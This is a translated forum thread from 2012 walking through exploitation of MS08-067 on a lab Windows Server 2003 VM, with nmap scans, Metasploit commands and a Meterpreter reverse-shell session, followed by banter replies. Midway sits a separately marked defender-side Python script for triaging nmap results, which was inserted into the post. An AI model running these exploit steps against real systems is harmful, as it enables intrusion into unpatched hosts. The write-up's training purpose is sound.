MS08-067 Win Server 2003 [review of the recent Cyber Jawara]
#1
Ass.wr.wb.
Sorry I only just got around to sharing this :D. OK, considering how easy the exploit was during the pentest session at the competition the other day, but what could I do? My host PC got remoted into and DDoSed, so I just had to accept it that day. I'm sharing this anyway for whoever gets the chance to join Cyber Jawara again next year. Hehehe, let's get straight to it.

attacker operating system: BackTrack 5 R2
address: 192.168.3.100
victim operating system: Windows Server 2003 (set up to match the state of the Win Server during the recent cyber competition)
address: 192.168.3.103 (vbox)

information gathering:
in this stage the attacker looks for information about the weaknesses present on the victim.
Code:
root@404:~# nmap 192.168.3.103

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-25 06:00 WIT
Nmap scan report for 192.168.3.103
Host is up (0.017s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1039/tcp open sbl
1040/tcp open netsaint
1048/tcp open neod2
1053/tcp open remote-as
1055/tcp open ansyslmd
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
MAC Address: 08:00:27:C3:C3:38 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds
Look at the 445/tcp line above: it turns out port 445 is open. Next, let's find out which SMB version this Windows Server 2003 is running.
Code:
root@404:~# nmap --script=smb-check-vulns 192.168.3.103

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-25 06:06 WIT
Nmap scan report for 192.168.3.103
Host is up (0.014s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1039/tcp open sbl
1040/tcp open netsaint
1048/tcp open neod2
1053/tcp open remote-as
1055/tcp open ansyslmd
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
MAC Address: 08:00:27:C3:C3:38 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
We now know the SMB version is MS08-067. Next I'll try to exploit Windows Server 2003 using Metasploit, the console version of course.

exploitation:
the exploitation is done with msfconsole
Code:
root@404:~# msfconsole


=[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 907 exploits - 493 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
=[ svn r15656 updated 6 days ago (2012.07.19)

msf >
then I use the exploit ms08_067_netapi

Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.3.103
RHOST => 192.168.3.103
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.3.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) >
then run that exploit with the command "exploit -j"
Code:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.3.100:4444
msf exploit(ms08_067_netapi) > [*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP1 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.3.103
sessions -l[*] Meterpreter session 1 opened (192.168.3.100:4444 -> 192.168.3.103:1196) at 2012-07-25 06:14:16 +0700

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.168.3.100:4444 -> 192.168.3.103:1196 (192.168.3.103)

msf exploit(ms08_067_netapi) >
Yep, I got the session. To pick the session, just run the command
Code:
sessions -i 1

and you get the meterpreter session. Then I dropped into a cmd shell with the "shell" command
[Image: shell-server2003.png]

here's how it looks from the Windows Server 2003 side
[Image: desktop-server2003.png]

reference from: http://koecroet.wordpress.com/
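As an added, defender-side example (not part of this post or the forum's own material): a Python script that parses nmap output like the two scans above and ranks hosts for patching, flagging the "MS08-067: VULNERABLE" result, SMB reachable on 139/445 (which implies the host firewall is off) and the checks nmap skipped. The sample input is a trimmed, constructed copy of the scan output above; SMB_PORTS and the HIGH/MEDIUM/LOW levels are my assumptions.

```python
import re
from dataclasses import dataclass, field
# Constructed sample: a trimmed copy of the "nmap --script=smb-check-vulns" output from the post above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.3.103
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
| smb-check-vulns:
| MS08-067: VULNERABLE
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""
SMB_PORTS = {139, 445}  # assumption: SMB ports a host firewall should block from untrusted networks

@dataclass
class HostFindings:
    address: str
    open_ports: list = field(default_factory=list)
    vulnerable: list = field(default_factory=list)  # checks that reported VULNERABLE
    unchecked: list = field(default_factory=list)   # checks nmap skipped (CHECK DISABLED)

def parse_nmap_report(text):
    """Parse nmap normal output (one or more hosts) into HostFindings records."""
    hosts, current = [], None
    for line in text.splitlines():
        if m := re.match(r"Nmap scan report for (\S+)", line):
            hosts.append(current := HostFindings(m.group(1)))
        elif current and (m := re.match(r"(\d+)/(?:tcp|udp)\s+open\b", line)):
            current.open_ports.append(int(m.group(1)))
        elif current and (m := re.match(r"\|_?\s+([^:]+?):\s+(.*)", line)):
            name, status = m.groups()  # NSE host-script result line, e.g. "| MS08-067: VULNERABLE"
            if status.startswith("VULNERABLE"):
                current.vulnerable.append(name)
            elif status.startswith("CHECK DISABLED"):
                current.unchecked.append(name)
    return hosts

def triage(hosts):
    """Rank hosts for remediation: missing patch > SMB reachable by the scanner > nothing found."""
    results = []
    for h in hosts:
        exposed = sorted(SMB_PORTS & set(h.open_ports))
        risk = "HIGH" if h.vulnerable else "MEDIUM" if exposed else "LOW"
        reasons = [f"missing patch: {', '.join(h.vulnerable)}"] if h.vulnerable else []
        reasons += [f"SMB reachable on {exposed} (host firewall probably off)"] if exposed else []
        reasons += [f"{len(h.unchecked)} checks skipped (unsafe probes disabled)"] if h.unchecked else []
        results.append((h.address, risk, reasons))
    return sorted(results, key=lambda r: ["HIGH", "MEDIUM", "LOW"].index(r[1]))
```

Feed it the saved output of a scan over a whole subnet (`nmap -oN`) and the HIGH entries are the hosts to patch or isolate first.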

#2
wow, great stuff bro kucrut, try looking for more of the vulns so this can be developed further :/

#3
(07-25-2012, 10:07 AM)ekawithoutyou Wrote: wow, great stuff bro kucrut, try looking for more of the vulns so this can be developed further :/

what do you mean?

#4
was the firewall on?

#5
I mean look for vulns on the other ports :/

#6
if port 445 is open, that means the firewall isn't active, bro :D. That's why I said it's a review of the recent Cyber Jawara :). Because at the time the firewall had to be turned off

#7
here it iiis, finally released :D
awesome, nice post bro :)

#8
koecroet can't accept defeat hahaha, let's take it as a beautiful lesson hahaha nice croet :)

#9
(07-25-2012, 02:14 PM)xsan-lahci Wrote: koecroet can't accept defeat hahaha, let's take it as a beautiful lesson hahaha nice croet :)

it's not that I can't accept it bro, I'm just sore about it. Accept it or not, it's all the same hahaha

#10
ohh hahaha, what matters is the experience :) whoever DDoSed during the contest, any plans to DDoS in the real world hahaha
